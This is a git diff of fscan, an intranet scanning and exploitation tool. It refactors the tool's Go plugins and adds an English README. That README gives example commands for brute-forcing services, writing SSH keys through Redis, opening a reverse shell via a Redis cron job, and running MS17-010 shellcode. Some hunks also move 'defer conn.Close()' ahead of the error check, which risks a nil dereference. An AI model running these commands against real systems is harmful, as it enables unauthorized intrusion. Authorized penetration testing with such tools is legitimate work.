diff --git a/Plugins/CVE-2020-0796.go b/Plugins/CVE-2020-0796.go index 3123f1ce..9bdd4ecc 100644 --- a/Plugins/CVE-2020-0796.go +++ b/Plugins/CVE-2020-0796.go @@ -106,11 +106,7 @@ func SmbGhostScan(info *common.HostInfo) error { ip, port, timeout := info.Host, 445, time.Duration(common.Timeout)*time.Second addr := fmt.Sprintf("%s:%v", info.Host, port) conn, err := common.WrapperTcpWithTimeout("tcp", addr, timeout) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return err } diff --git a/Plugins/NetBIOS.go b/Plugins/NetBIOS.go index 8b76939d..ddb0ebed 100644 --- a/Plugins/NetBIOS.go +++ b/Plugins/NetBIOS.go @@ -18,7 +18,7 @@ func NetBIOS(info *common.HostInfo) error { netbios, _ := NetBIOS1(info) output := netbios.String() if len(output) > 0 { - result := fmt.Sprintf("[*] NetBios: %-15s %s", info.Host, output) + result := fmt.Sprintf("[*] NetBios %-15s %s", info.Host, output) common.LogSuccess(result) return nil } @@ -41,11 +41,7 @@ func NetBIOS1(info *common.HostInfo) (netbios NetBiosInfo, err error) { realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) var conn net.Conn conn, err = common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return } @@ -93,11 +89,7 @@ func GetNbnsname(info *common.HostInfo) (netbios NetBiosInfo, err error) { //senddata1 := []byte("ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01") realhost := fmt.Sprintf("%s:137", info.Host) conn, err := net.DialTimeout("udp", realhost, time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return } diff --git a/Plugins/fcgiscan.go b/Plugins/fcgiscan.go index 39e0ae42..a217e53e 100644 --- a/Plugins/fcgiscan.go +++ b/Plugins/fcgiscan.go @@ -96,16 +96,16 @@ func FcgiScan(info *common.HostInfo) { if strings.Contains(output, cutLine) { //命令成功回显 output = strings.SplitN(output, cutLine, 2)[0] if len(stderr) > 0 { - result = fmt.Sprintf("[+] FCGI: %v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr)) + result = fmt.Sprintf("[+] FCGI %v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr)) } else { - result = fmt.Sprintf("[+] FCGI: %v:%v \n%v", info.Host, info.Ports, output) + result = fmt.Sprintf("[+] FCGI %v:%v \n%v", info.Host, info.Ports, output) } common.LogSuccess(result) } else if strings.Contains(output, "File not found") || strings.Contains(output, "Content-type") || strings.Contains(output, "Status") { if len(stderr) > 0 { - result = fmt.Sprintf("[+] FCGI:%v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr)) + result = fmt.Sprintf("[+] FCGI %v:%v \n%vstderr:%v\nplesa try other path,as -path /www/wwwroot/index.php", info.Host, info.Ports, output, string(stderr)) } else { - result = fmt.Sprintf("[+] FCGI:%v:%v \n%v", info.Host, info.Ports, output) + result = fmt.Sprintf("[+] FCGI %v:%v \n%v", info.Host, info.Ports, output) } common.LogSuccess(result) } @@ -191,38 +191,38 @@ func New(addr string, timeout int64) (fcgi *FCGIClient, err error) { return } -func (c *FCGIClient) writeRecord(recType uint8, reqId uint16, content []byte) (err error) { - c.mutex.Lock() - defer c.mutex.Unlock() - c.buf.Reset() - c.h.init(recType, reqId, len(content)) - if err := binary.Write(&c.buf, binary.BigEndian, c.h); err != nil { +func (this *FCGIClient) writeRecord(recType uint8, reqId uint16, content []byte) (err error) { + this.mutex.Lock() + defer this.mutex.Unlock() + this.buf.Reset() + this.h.init(recType, reqId, len(content)) + if err := binary.Write(&this.buf, binary.BigEndian, this.h); err != nil { return err } - if _, err := c.buf.Write(content); err != nil { + if _, err := this.buf.Write(content); err != nil { return err } - if _, err := c.buf.Write(pad[:c.h.PaddingLength]); err != nil { + if _, err := this.buf.Write(pad[:this.h.PaddingLength]); err != nil { return err } - _, err = c.rwc.Write(c.buf.Bytes()) + _, err = this.rwc.Write(this.buf.Bytes()) return err } -func (c *FCGIClient) writeBeginRequest(reqId uint16, role uint16, flags uint8) error { +func (this *FCGIClient) writeBeginRequest(reqId uint16, role uint16, flags uint8) error { b := [8]byte{byte(role >> 8), byte(role), flags} - return c.writeRecord(FCGI_BEGIN_REQUEST, reqId, b[:]) + return this.writeRecord(FCGI_BEGIN_REQUEST, reqId, b[:]) } -func (c *FCGIClient) writeEndRequest(reqId uint16, appStatus int, protocolStatus uint8) error { +func (this *FCGIClient) writeEndRequest(reqId uint16, appStatus int, protocolStatus uint8) error { b := make([]byte, 8) binary.BigEndian.PutUint32(b, uint32(appStatus)) b[4] = protocolStatus - return c.writeRecord(FCGI_END_REQUEST, reqId, b) + return this.writeRecord(FCGI_END_REQUEST, reqId, b) } -func (c *FCGIClient) writePairs(recType uint8, reqId uint16, pairs map[string]string) error { - w := newWriter(c, recType, reqId) +func (this *FCGIClient) writePairs(recType uint8, reqId uint16, pairs map[string]string) error { + w := newWriter(this, recType, reqId) b := make([]byte, 8) for k, v := range pairs { n := encodeSize(b, uint32(len(k))) @@ -241,6 +241,29 @@ func (c *FCGIClient) writePairs(recType uint8, reqId uint16, pairs map[string]st return nil } +func readSize(s []byte) (uint32, int) { + if len(s) == 0 { + return 0, 0 + } + size, n := uint32(s[0]), 1 + if size&(1<<7) != 0 { + if len(s) < 4 { + return 0, 0 + } + n = 4 + size = binary.BigEndian.Uint32(s) + size &^= 1 << 31 + } + return size, n +} + +func readString(s []byte, size uint32) string { + if size > uint32(len(s)) { + return "" + } + return string(s[:size]) +} + func encodeSize(b []byte, size uint32) int { if size > 127 { size |= 1 << 31 @@ -301,21 +324,21 @@ func (w *streamWriter) Close() error { return w.c.writeRecord(w.recType, w.reqId, nil) } -func (c *FCGIClient) Request(env map[string]string, reqStr string) (retout []byte, reterr []byte, err error) { +func (this *FCGIClient) Request(env map[string]string, reqStr string) (retout []byte, reterr []byte, err error) { var reqId uint16 = 1 - defer c.rwc.Close() + defer this.rwc.Close() - err = c.writeBeginRequest(reqId, uint16(FCGI_RESPONDER), 0) + err = this.writeBeginRequest(reqId, uint16(FCGI_RESPONDER), 0) if err != nil { return } - err = c.writePairs(FCGI_PARAMS, reqId, env) + err = this.writePairs(FCGI_PARAMS, reqId, env) if err != nil { return } if len(reqStr) > 0 { - err = c.writeRecord(FCGI_STDIN, reqId, []byte(reqStr)) + err = this.writeRecord(FCGI_STDIN, reqId, []byte(reqStr)) if err != nil { return } @@ -325,27 +348,25 @@ func (c *FCGIClient) Request(env map[string]string, reqStr string) (retout []byt var err1 error // recive untill EOF or FCGI_END_REQUEST -OUTER: for { - err1 = rec.read(c.rwc) + err1 = rec.read(this.rwc) if err1 != nil { if err1 != io.EOF { err = err1 } - break } - - switch rec.h.Type { - case FCGI_STDOUT: + switch { + case rec.h.Type == FCGI_STDOUT: retout = append(retout, rec.content()...) - case FCGI_STDERR: + case rec.h.Type == FCGI_STDERR: reterr = append(reterr, rec.content()...) - case FCGI_END_REQUEST: + case rec.h.Type == FCGI_END_REQUEST: fallthrough default: - break OUTER + break } } + return } diff --git a/Plugins/findnet.go b/Plugins/findnet.go index 2d8d0c57..34025052 100644 --- a/Plugins/findnet.go +++ b/Plugins/findnet.go @@ -24,11 +24,7 @@ func Findnet(info *common.HostInfo) error { func FindnetScan(info *common.HostInfo) error { realhost := fmt.Sprintf("%s:%v", info.Host, 135) conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return err } @@ -109,7 +105,7 @@ func read(text []byte, host string) error { hostnames := strings.Replace(encodedStr, "0700", "", -1) hostname := strings.Split(hostnames, "000000") - result := "[*] NetInfo:\n[*]" + host + result := "[*] NetInfo \n[*]" + host if name != "" { result += "\n [->]" + name } diff --git a/Plugins/icmp.go b/Plugins/icmp.go index d29c83b1..f7c153cd 100644 --- a/Plugins/icmp.go +++ b/Plugins/icmp.go @@ -159,11 +159,7 @@ func RunIcmp2(hostslist []string, chanHosts chan string) { func icmpalive(host string) bool { startTime := time.Now() conn, err := net.DialTimeout("ip4:icmp", host, 6*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return false } diff --git a/Plugins/mongodb.go b/Plugins/mongodb.go index cc814240..947137a8 100644 --- a/Plugins/mongodb.go +++ b/Plugins/mongodb.go @@ -52,11 +52,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) { if err != nil { return "", err } - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() err = conn.SetReadDeadline(time.Now().Add(time.Duration(common.Timeout) * time.Second)) if err != nil { return "", err @@ -83,7 +79,7 @@ func MongodbUnauth(info *common.HostInfo) (flag bool, err error) { } if strings.Contains(reply, "totalLinesWritten") { flag = true - result := fmt.Sprintf("[+] Mongodb:%v unauthorized", realhost) + result := fmt.Sprintf("[+] Mongodb %v unauthorized", realhost) common.LogSuccess(result) } return flag, err diff --git a/Plugins/ms17010.go b/Plugins/ms17010.go index 0bf5bcac..72413f8b 100644 --- a/Plugins/ms17010.go +++ b/Plugins/ms17010.go @@ -39,11 +39,7 @@ func MS17010Scan(info *common.HostInfo) error { ip := info.Host // connecting to a host in LAN if reachable should be very quick conn, err := common.WrapperTcpWithTimeout("tcp", ip+":445", time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { //fmt.Printf("failed to connect to %s\n", ip) return err @@ -134,7 +130,7 @@ func MS17010Scan(info *common.HostInfo) error { //fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os) //if runtime.GOOS=="windows" {fmt.Printf("%s\tMS17-010\t(%s)\n", ip, os) //} else{fmt.Printf("\033[33m%s\tMS17-010\t(%s)\033[0m\n", ip, os)} - result := fmt.Sprintf("[+] %s\tMS17-010\t(%s)", ip, os) + result := fmt.Sprintf("[+] MS17-010 %s\t(%s)", ip, os) common.LogSuccess(result) defer func() { if common.SC != "" { @@ -156,12 +152,12 @@ func MS17010Scan(info *common.HostInfo) error { } if reply[34] == 0x51 { - result := fmt.Sprintf("[+] %s has DOUBLEPULSAR SMB IMPLANT", ip) + result := fmt.Sprintf("[+] MS17-010 %s has DOUBLEPULSAR SMB IMPLANT", ip) common.LogSuccess(result) } } else { - result := fmt.Sprintf("[*] %s (%s)", ip, os) + result := fmt.Sprintf("[*] OsInfo %s\t(%s)", ip, os) common.LogSuccess(result) } return err diff --git a/Plugins/mssql.go b/Plugins/mssql.go index 6f64c679..30b14299 100644 --- a/Plugins/mssql.go +++ b/Plugins/mssql.go @@ -48,7 +48,7 @@ func MssqlConn(info *common.HostInfo, user string, pass string) (flag bool, err defer db.Close() err = db.Ping() if err == nil { - result := fmt.Sprintf("[+] mssql:%v:%v:%v %v", Host, Port, Username, Password) + result := fmt.Sprintf("[+] mssql %v:%v:%v %v", Host, Port, Username, Password) common.LogSuccess(result) flag = true } diff --git a/Plugins/mysql.go b/Plugins/mysql.go index 03c6aac5..db3e440a 100644 --- a/Plugins/mysql.go +++ b/Plugins/mysql.go @@ -48,7 +48,7 @@ func MysqlConn(info *common.HostInfo, user string, pass string) (flag bool, err defer db.Close() err = db.Ping() if err == nil { - result := fmt.Sprintf("[+] mysql:%v:%v:%v %v", Host, Port, Username, Password) + result := fmt.Sprintf("[+] mysql %v:%v:%v %v", Host, Port, Username, Password) common.LogSuccess(result) flag = true } diff --git a/Plugins/oracle.go b/Plugins/oracle.go index 0db41427..be9ad2dc 100644 --- a/Plugins/oracle.go +++ b/Plugins/oracle.go @@ -48,7 +48,7 @@ func OracleConn(info *common.HostInfo, user string, pass string) (flag bool, err defer db.Close() err = db.Ping() if err == nil { - result := fmt.Sprintf("[+] oracle:%v:%v:%v %v", Host, Port, Username, Password) + result := fmt.Sprintf("[+] oracle %v:%v:%v %v", Host, Port, Username, Password) common.LogSuccess(result) flag = true } diff --git a/Plugins/portscan.go b/Plugins/portscan.go index 7903dd3a..16dad80e 100644 --- a/Plugins/portscan.go +++ b/Plugins/portscan.go @@ -74,11 +74,7 @@ func PortScan(hostslist []string, ports string, timeout int64) []string { func PortConnect(addr Addr, respondingHosts chan<- string, adjustedTimeout int64, wg *sync.WaitGroup) { host, port := addr.ip, addr.port conn, err := common.WrapperTcpWithTimeout("tcp4", fmt.Sprintf("%s:%v", host, port), time.Duration(adjustedTimeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err == nil { address := host + ":" + strconv.Itoa(port) result := fmt.Sprintf("%s open", address) diff --git a/Plugins/rdp.go b/Plugins/rdp.go index 2754a9a7..435e9031 100644 --- a/Plugins/rdp.go +++ b/Plugins/rdp.go @@ -74,9 +74,9 @@ func worker(host, domain string, port int, wg *sync.WaitGroup, brlist chan Brute if flag == true && err == nil { var result string if domain != "" { - result = fmt.Sprintf("[+] RDP:%v:%v:%v\\%v %v", host, port, domain, user, pass) + result = fmt.Sprintf("[+] RDP %v:%v:%v\\%v %v", host, port, domain, user, pass) } else { - result = fmt.Sprintf("[+] RDP:%v:%v:%v %v", host, port, user, pass) + result = fmt.Sprintf("[+] RDP %v:%v:%v %v", host, port, user, pass) } common.LogSuccess(result) *signal = true @@ -127,11 +127,7 @@ func NewClient(host string, logLevel glog.LEVEL) *Client { func (g *Client) Login(domain, user, pwd string, timeout int64) error { conn, err := common.WrapperTcpWithTimeout("tcp", g.Host, time.Duration(timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return fmt.Errorf("[dial err] %v", err) } @@ -187,7 +183,7 @@ func (g *Client) Login(domain, user, pwd string, timeout int64) error { glog.Info("on update:", rectangles) }) g.pdu.On("done", func() { - if !breakFlag { + if breakFlag == false { breakFlag = true wg.Done() } diff --git a/Plugins/redis.go b/Plugins/redis.go index 89875b4f..e5cc4979 100644 --- a/Plugins/redis.go +++ b/Plugins/redis.go @@ -48,11 +48,7 @@ func RedisConn(info *common.HostInfo, pass string) (flag bool, err error) { flag = false realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return flag, err } @@ -88,11 +84,7 @@ func RedisUnauth(info *common.HostInfo) (flag bool, err error) { flag = false realhost := fmt.Sprintf("%s:%v", info.Host, info.Ports) conn, err := common.WrapperTcpWithTimeout("tcp", realhost, time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return flag, err } diff --git a/Plugins/scanner.go b/Plugins/scanner.go index 58c2c3a2..3c3c8543 100644 --- a/Plugins/scanner.go +++ b/Plugins/scanner.go @@ -31,7 +31,6 @@ func Scan(info common.HostInfo) { common.LogWG.Wait() return } - common.GC() var AlivePorts []string if common.Scantype == "webonly" || common.Scantype == "webpoc" { AlivePorts = NoPortScan(Hosts, info.Ports) @@ -52,7 +51,6 @@ func Scan(info common.HostInfo) { common.HostPort = nil fmt.Println("[*] AlivePorts len is:", len(AlivePorts)) } - common.GC() var severports []string //severports := []string{"21","22","135"."445","1433","3306","5432","6379","9200","11211","27017"...} for _, port := range common.PORTList { severports = append(severports, strconv.Itoa(port)) @@ -85,12 +83,10 @@ func Scan(info common.HostInfo) { } } } - common.GC() for _, url := range common.Urls { info.Url = url AddScan(web, info, &ch, &wg) } - common.GC() wg.Wait() common.LogWG.Wait() close(common.Results) diff --git a/Plugins/smb2.go b/Plugins/smb2.go index e57e90db..51b86bdc 100644 --- a/Plugins/smb2.go +++ b/Plugins/smb2.go @@ -67,11 +67,7 @@ func SmbScan2(info *common.HostInfo) (tmperr error) { func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, hasprint bool) (flag bool, err error, flag2 bool) { conn, err := net.DialTimeout("tcp", info.Host+":445", time.Duration(common.Timeout)*time.Second) - defer func() { - if conn != nil { - conn.Close() - } - }() + defer conn.Close() if err != nil { return } @@ -100,9 +96,9 @@ func Smb2Con(info *common.HostInfo, user string, pass string, hash []byte, haspr if !hasprint { var result string if common.Domain != "" { - result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) + result = fmt.Sprintf("[*] SMB2-shares %v:%v:%v\\%v ", info.Host, info.Ports, common.Domain, user) } else { - result = fmt.Sprintf("[*] SMB2-shares:%v:%v:%v ", info.Host, info.Ports, user) + result = fmt.Sprintf("[*] SMB2-shares %v:%v:%v ", info.Host, info.Ports, user) } if len(hash) > 0 { result += "hash: " + common.Hash diff --git a/Plugins/webtitle.go b/Plugins/webtitle.go index f9685697..1047bfb9 100644 --- a/Plugins/webtitle.go +++ b/Plugins/webtitle.go @@ -152,7 +152,7 @@ func geturl(info *common.HostInfo, flag int, CheckData []WebScan.CheckDatas) (er if err1 == nil { reurl = redirURL.String() } - result := fmt.Sprintf("[*] WebTitle: %-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title) + result := fmt.Sprintf("[*] WebTitle %-25v code:%-3v len:%-6v title:%v", resp.Request.URL, resp.StatusCode, length, title) if reurl != "" { result += fmt.Sprintf(" 跳转url: %s", reurl) } diff --git a/README.md b/README.md index fc6631a3..5b52d19b 100644 --- a/README.md +++ b/README.md @@ -212,6 +212,7 @@ https://github.com/jjf012/gopoc # 10. 最近更新 +[+] 2023/11/13 加入控制台颜色输出(可-nocolor)、保存文件json结构(-json)、修改tls最低版本为1.0、端口分组(-p db,web,service)。 [+] 2022/11/19 加入hash碰撞、wmiexec无回显命令执行。 [+] 2022/7/14 -hf 支持host:port和host/xx:port格式,rule.Search 正则匹配范围从body改成header+body,-nobr不再包含-nopoc.优化webtitle 输出格式。 [+] 2022/7/6 加入手工gc回收,尝试节省无用内存。 -url 支持逗号隔开。 修复一个poc模块bug。-nobr不再包含-nopoc。 diff --git a/README_EN.md b/README_EN.md new file mode 100644 index 00000000..ef332ee2 --- /dev/null +++ b/README_EN.md @@ -0,0 +1,260 @@ +# fscan +[中文][url-doczh] + +# 1. Introduction +An intranet comprehensive scanning tool, which is convenient for automatic and omnidirectional missed scanning. +It supports host survival detection, port scanning, explosion of common services, ms17010, Redis batch public key writing, planned task rebound shell, reading win network card information, web fingerprint identification, web vulnerability scanning, netbios detection, domain control identification and other functions. + +# 2. Functions +1.Information collection: +* Survival detection(icmp) +* Port scanning + +2.Blasting: +* Various service blasting(ssh、smb、rdp, etc.) +* Database password blasting(mysql、mssql、redis、psql、oracle, etc.) + +3.System information, vulnerability scanning: +* Netbios detection, domain control identification +* Collect NIC information +* High Risk Vulnerability Scanning(ms17010, etc.) + +4.Web detection: +* Webtitle detection +* Web fingerprinting (cms, oa framework, etc.) +* Web vulnerability scanning (weblogic, st2, etc., also supports xray poc) + +5.Exploit: +* Write redis public key and scheduled tasks +* Excute ssh command +* Use the ms17017 vulnerability (implanted shellcode), such as adding users, etc. + +6.Others: +* Save ouput result + +# 3. Instructions +Getting Started +``` +fscan.exe -h 192.168.1.1/24 +fscan.exe -h 192.168.1.1/16 +``` + +Advanced +``` +fscan.exe -h 192.168.1.1/24 -np -no -nopoc(Skip survival detection, do not save output result, skip web poc scanning) +fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (Redis write public key) +fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (Redis scheduled task rebound shell) +fscan.exe -h 192.168.1.1/24 -c whoami (Execute ssh command) +fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (Specify ssh module and port) +fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (Load the specified file and password to blast +fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (Specify the path to save the scan results, which is saved in the current path by default) +fscan.exe -h 192.168.1.1/8 192.x.x.1 and 192.x.x.254 of segment A, convenient for quickly viewing network segment information ) +fscan.exe -h 192.168.1.1/24 -m smb -pwd password (Smb password crash) +fscan.exe -h 192.168.1.1/24 -m ms17010 (Specified ms17010 module) +fscan.exe -hf ip.txt (Import target from file) +fscan.exe -u http://baidu.com -proxy 8080 (Scan a url and set http proxy http://127.0.0.1:8080) +fscan.exe -h 192.168.1.1/24 -nobr -nopoc (Do not blast, do not scan Web poc, to reduce traffic) +fscan.exe -h 192.168.1.1/24 -pa 3389 (Join 3389->rdp scan) +fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (Proxy only supports simple tcp functions, and libraries with some functions do not support proxy settings) +fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (Built-in functions such as adding users are only applicable to alternative tools, and other special tools for using ms17010 are recommended) +fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (Hash collision) +fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx(Wmiexec module no echo command execution) +``` +Compile command +``` +go build -ldflags="-s -w " -trimpath main.go +upx -9 fscan.exe (Optional, compressed) +``` +Installation for arch users +`yay -S fscan-git or paru -S fscan-git` + +Full parameters +``` +Usage of ./fscan: + -br int + Brute threads (default 1) + -c string + exec command (ssh|wmiexec) + -cookie string + set poc cookie,-cookie rememberMe=login + -debug int + every time to LogErr (default 60) + -dns + using dnslog poc + -domain string + smb domain + -full + poc full scan,as: shiro 100 key + -h string + IP address of the host you want to scan,for example: 192.168.11.11 | 192.168.11.11-255 | 192.168.11.11,192.168.11.12 + -hash string + hash + -hf string + host file, -hf ip.txt + -hn string + the hosts no scan,as: -hn 192.168.1.1/24 + -m string + Select scan type ,as: -m ssh (default "all") + -no + not to save output log + -nobr + not to Brute password + -nopoc + not to scan web vul + -np + not to ping + -num int + poc rate (default 20) + -o string + Outputfile (default "result.txt") + -p string + Select a port,for example: 22 | 1-65535 | 22,80,3306 (default "21,22,80,81,135,139,443,445,1433,1521,3306,5432,6379,7001,8000,8080,8089,9000,9200,11211,27017") + -pa string + add port base DefaultPorts,-pa 3389 + -path string + fcgi、smb romote file path + -ping + using ping replace icmp + -pn string + the ports no scan,as: -pn 445 + -pocname string + use the pocs these contain pocname, -pocname weblogic + -pocpath string + poc file path + -portf string + Port File + -proxy string + set poc proxy, -proxy http://127.0.0.1:8080 + -pwd string + password + -pwda string + add a password base DefaultPasses,-pwda password + -pwdf string + password file + -rf string + redis file to write sshkey file (as: -rf id_rsa.pub) + -rs string + redis shell to write cron file (as: -rs 192.168.1.1:6666) + -sc string + ms17 shellcode,as -sc add + -silent + silent scan + -socks5 string + set socks5 proxy, will be used in tcp connection, timeout setting will not work + -sshkey string + sshkey file (id_rsa) + -t int + Thread nums (default 600) + -time int + Set timeout (default 3) + -top int + show live len top (default 10) + -u string + url + -uf string + urlfile + -user string + username + -usera string + add a user base DefaultUsers,-usera user + -userf string + username file + -wmi + start wmi + -wt int + Set web timeout (default 5) +``` + +# 4. Demo + +`fscan.exe -h 192.168.x.x (Open all functions, ms17010, read network card information)` +![](image/1.png) + +![](image/4.png) + +`fscan.exe -h 192.168.x.x -rf id_rsa.pub (Redis write public key)` +![](image/2.png) + +`fscan.exe -h 192.168.x.x -c "whoami;id" (ssh command)` +![](image/3.png) + +`fscan.exe -h 192.168.x.x -p80 -proxy http://127.0.0.1:8080 (Support for xray poc)` +![](image/2020-12-12-13-34-44.png) + +`fscan.exe -h 192.168.x.x -p 139 (Netbios detection, domain control identification, the [+]DC in the figure below represents domain control)` +![](image/netbios.png) + +`go run .\main.go -h 192.168.x.x/24 -m netbios (Show complete netbios information)` +![](image/netbios1.png) + +`go run .\main.go -h 192.0.0.0/8 -m icmp(Detect the gateway and several random IPs of each segment C, and count the number of surviving top 10 segments B and C)` +![img.png](image/live.png) + +# 5. Disclaimer + +This tool is only for **legally authorized** enterprise security construction activities. If you need to test the usability of this tool, please build a target machine environment by yourself. + +In order to avoid being used maliciously, all pocs included in this project are theoretical judgments of vulnerabilities, there is no process of exploiting vulnerabilities, and no real attacks and exploits will be launched on the target. + +When using this tool for detection, you should ensure that the behavior complies with local laws and regulations, and you have obtained sufficient authorization. **Do not scan unauthorized targets**. + +If you have any illegal acts during the use of this tool, you shall bear the corresponding consequences by yourself, and we will not bear any legal and joint liability. + +Before installing and using this tool, please **be sure to carefully read and fully understand the content of each clause**. Restrictions, exemption clauses or other clauses involving your major rights and interests may remind you to pay attention in the form of bold, underline, etc. . +Unless you have fully read, fully understood and accepted all the terms of this agreement, please do not install and use this tool. Your use behavior or your acceptance of this agreement in any other express or implied way shall be deemed to have read and agreed to be bound by this agreement. + + +# 6. 404StarLink 2.0 - Galaxy +![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png) + +Fscan is the member of 404Team [404StarLink2.0](https://github.com/knownsec/404StarLink2.0-Galaxy),If you have any questions about fscan or want to find a partner to communicate with, you can adding groups. + +- [https://github.com/knownsec/404StarLink2.0-Galaxy#community](https://github.com/knownsec/404StarLink2.0-Galaxy#community) + + +# 7. Star Chart +[![Stargazers over time](https://starchart.cc/shadow1ng/fscan.svg)](https://starchart.cc/shadow1ng/fscan) + +# 8. Donation + If you think this project is helpful to you, invite the author to have a drink🍹 [click](image/sponsor.png) + +# 9. Reference links +https://github.com/Adminisme/ServerScan +https://github.com/netxfly/x-crack +https://github.com/hack2fun/Gscan +https://github.com/k8gege/LadonGo +https://github.com/jjf012/gopoc + + +# 10. Dynamics +[+] 2022/11/19 Add hash collision, wmiexec echo free command execution function +[+] 2022/7/14 Add -hf parameter, support host: port and host/xx: port formats, rule.Search regular matching range is changed from body to header+body, and -nobr no longer includes -nopoc. Optimize webtitle output format. +[+] 2022/7/6 Add manual gc recycling to try to save useless memory, -Urls support comma separation. Fix a poc module bug- Nobr no longer contains nopoc. +[+] 2022/7/2 Strengthen the poc fuzzy module to support running backup files, directories, shiro keys (10 keys by default, 100 keys with the -full parameter), etc.Add ms17017 (use parameter: -sc add), which can be used in ms17010 exp Go defines the shell code, and built-in functions such as adding users. +Add poc and fingerprint. Socks5 proxy is supported. Because the body fingerprint is more complete, the icon icon is no longer running by default. +[+] 2022/4/20 The poc module adds the specified directory or file -path poc path, the port can specify the file -portf port.txt, the rdp module adds the multi-threaded explosion demo, and -br xx specifies the thread. +[+] 2022/2/25 Add - m webonly to skip port scanning and directly access http. Thanks @ AgeloVito +[+] 2022/1/11 Add oracle password explosion. +[+] 2022/1/7 When scanning IP/8, each C segment gateway and several random IPs will be scanned by default. Recommended parameter: -h ip/8 -m icmp. The LiveTop function is added. When detecting the survival, the number of B and C segment IPs of top10 will be output by default. +[+] 2021/12/7 Add rdp scanning and port parameter -pa 3389 (the port will be added based on the original port list) +[+] 2021/12/1 Optimize the xray parsing module, support groups, add poc, add https judgment (tls handshake package), optimize the ip parsing module (support all ip/xx), add the blasting shutdown parameter nobr, add the skip certain ip scanning function -hn 192.168.1.1, add the skip certain port scanning function - pn 21445, and add the scan Docker unauthorized vulnerability. +[+] 2021/6/18 Improve the poc mechanism. If the fingerprint is identified, the poc will be sent according to the fingerprint information. If the fingerprint is not identified, all poc will be printed once. +[+] 2021/5/29 Adding the fcgi protocol to execute the scan of unauthorized commands, optimizing the poc module, optimizing the icmp module, and adding the ssh module to the private key connection. +[+] 2021/5/15 Added win03 version (deleted xray_poc module), added silent scanning mode, added web fingerprint, fixed netbios module array overrun, added a CheckErrs dictionary, and added gzip decoding to webtitle. +[+] 2021/5/6 Update mod library, poc and fingerprint. Modify thread processing mechanism, netbios detection, domain control identification module, webtitle encoding module, etc. +[+] 2021/4/22 Modify webtitle module and add gbk decoding. +[+] 2021/4/21 Add netbios detection and domain control identification functions. +[+] 2021/3/4 Support -u url and -uf parameters, support batch scan URLs. +[+] 2021/2/25 Modify the yaml parsing module to support password explosion, such as tomcat weak password. The new sets parameter in yaml is an array, which is used to store passwords. See tomcat-manager-week.yaml for details. +[+] 2021/2/8 Add fingerprint identification function to identify common CMS and frameworks, such as Zhiyuan OA and Tongda OA. +[+] 2021/2/5 Modify the icmp packet mode, which is more suitable for large-scale detection. +Modify the error prompt. If there is no new progress in - debug within 10 seconds, the current progress will be printed every 10 seconds. +[+] 2020/12/12 The yaml parsing engine has been added to support the poc of xray. By default, all the poc are used (the poc of xray has been filtered). You can use - pocname weblogic, and only one or some poc is used. Need go version 1.16 or above, and can only compile the latest version of go for testing. +[+] 2020/12/6 Optimize the icmp module and add the -domain parameter (for the smb blasting module, applicable to domain users) +[+] 2020/12/03 Optimize the ip segment processing module, icmp, port scanning module. 192.168.1.1-192.168.255.255 is supported. +[+] 2020/11/17 The -ping parameter is added to replace icmp packets with ping in the survival detection module. +[+] 2020/11/17 WebScan module and shiro simple recognition are added. Skip certificate authentication during https access. Separate the timeout of the service module and the web module, and add the -wt parameter (WebTimeout). +[+] 2020/11/16 Optimize the icmp module and add the -it parameter (IcmpThreads). The default value is 11000, which is suitable for scanning section B. +[+] 2020/11/15 Support importt ip from file, -hf ip.txt, and process de duplication ips. + +[url-doczh]: README.md \ No newline at end of file diff --git a/WebScan/InfoScan.go b/WebScan/InfoScan.go index bf71d688..5dcc4491 100644 --- a/WebScan/InfoScan.go +++ b/WebScan/InfoScan.go @@ -38,7 +38,7 @@ func InfoCheck(Url string, CheckData *[]CheckDatas) []string { infoname = 